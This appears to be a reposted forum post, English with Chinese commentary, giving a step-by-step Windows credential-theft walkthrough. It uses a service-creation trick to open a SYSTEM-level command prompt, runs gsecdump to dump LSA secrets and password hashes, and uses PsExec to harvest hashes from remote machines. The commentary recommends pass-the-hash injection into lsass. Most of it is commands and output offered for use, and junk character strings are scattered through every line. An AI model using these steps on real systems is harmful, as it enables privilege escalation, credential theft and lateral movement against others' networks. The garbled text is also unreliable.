o get a DOS Prompt as NT system:- A- k" S/ Z0 X+ l9 G' \. w' F
7 o; H* L( e1 W) Y) F
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact6 G' f) k/ y& |7 a; x( o
[SC] CreateService SUCCESS" N5 p# |/ r/ G+ V* I H
& j; R+ m& b3 _7 t6 I: U+ n$ lC:\>sc start shellcmdline1 P; v% U ] y. B
[SC] StartService FAILED 1053:) W- {# i: v7 t1 K; k7 }/ Q
+ S5 M ~! w7 R3 t% E9 z1 i
The service did not respond to the start or control request in a timely fashion.: f. n7 N% K$ A6 m: n1 S3 h2 G
; m" x# V1 M( Z" eC:\>sc delete shellcmdline* X( [: S( L4 |/ \1 K- B6 I: Z
[SC] DeleteService SUCCESS+ _' d1 M. t& y. m- m
) D3 {+ _ Q; q1 W------------
0 ]: t* R1 i) `- A- O8 m h) [% b' [+ ]* o# |/ M8 H# M% i) {
Then in the new DOS window:
3 d# {6 p# N7 b+ @/ G& A% [: z9 p
S& @- g4 Q9 y& C1 q5 KMicrosoft Windows XP [Version 5.1.2600]
2 N! T5 Y: L l2 K(C) Copyright 1985-2001 Microsoft Corp.
5 m. \% i/ p4 c% Q& l8 M% v* d* S5 e8 [( ^+ x6 {( A: m
C:\WINDOWS\system32>whoami+ M* Q4 c$ n" B/ Q
NT AUTHORITY\SYSTEM
5 i3 |* d% |7 \& `+ \% l
7 F, S1 `7 d; W4 Q1 V4 kC:\WINDOWS\system32>gsecdump -h) t- u- S1 e% N0 U" l) p
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
6 g% G3 C+ h# p2 w" ^usage: gsecdump [options]. i$ ~* q4 B1 w i2 Z1 @8 Y) k
# M2 X" F2 q- T- ^7 qoptions:
6 Y. Q7 k+ A5 Z. w( N-h [ --help ] show help
9 A1 D7 L0 f9 w& Y/ {7 _-a [ --dump_all ] dump all secrets
* ?, V1 e" H3 Z. m: L- |-l [ --dump_lsa ] dump lsa secrets
8 n$ d8 N; }) O$ }-w [ --dump_wireless ] dump microsoft wireless connections7 x, t1 [* d- v( }
-u [ --dump_usedhashes ] dump hashes from active logon sessions% q. k+ E6 A/ _* D- E% E
-s [ --dump_hashes ] dump hashes from SAM/AD2 @ P2 E5 _. R4 ?' m( X7 f
^. I L( t: {% v5 Q; N* C% i
Although I like to use:
$ m2 A/ g; U, L/ Z {3 o+ l) r3 J
( u2 P1 q. o9 v8 @' u, W% q- y7 nPsExec v1.83 - Execute processes remotely) R, `9 B1 A. D' g# n
Copyright (C) 2001-2007 Mark Russinovich
) E& c# P+ n( ?, JSysinternals - 链接标记[url]www.sysinternals.com[/url]$ t& r( N2 `0 ~/ E
3 E6 ^$ I9 B* e" @2 iC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT4 h3 S+ a! i( I! t
* O. A- h- i% j8 A5 F( B5 M4 _: `$ Jto get the hashes from active logon sessions of a remote system.
! A; x+ ]9 l1 [( K ?$ d4 o; n) t( \* z7 o! G
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 A0 s1 ?$ f" C
) ^/ W% @6 H: _0 x2 P' @7 `提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.( `6 I7 m! Q* i! E( P1 g/ p2 X! |' e* v
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]$ U" Z6 U u2 {' A6 k3 r
9 a% V+ `) y& Q z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
$ {( K+ p. T" O/ u( b* |( h |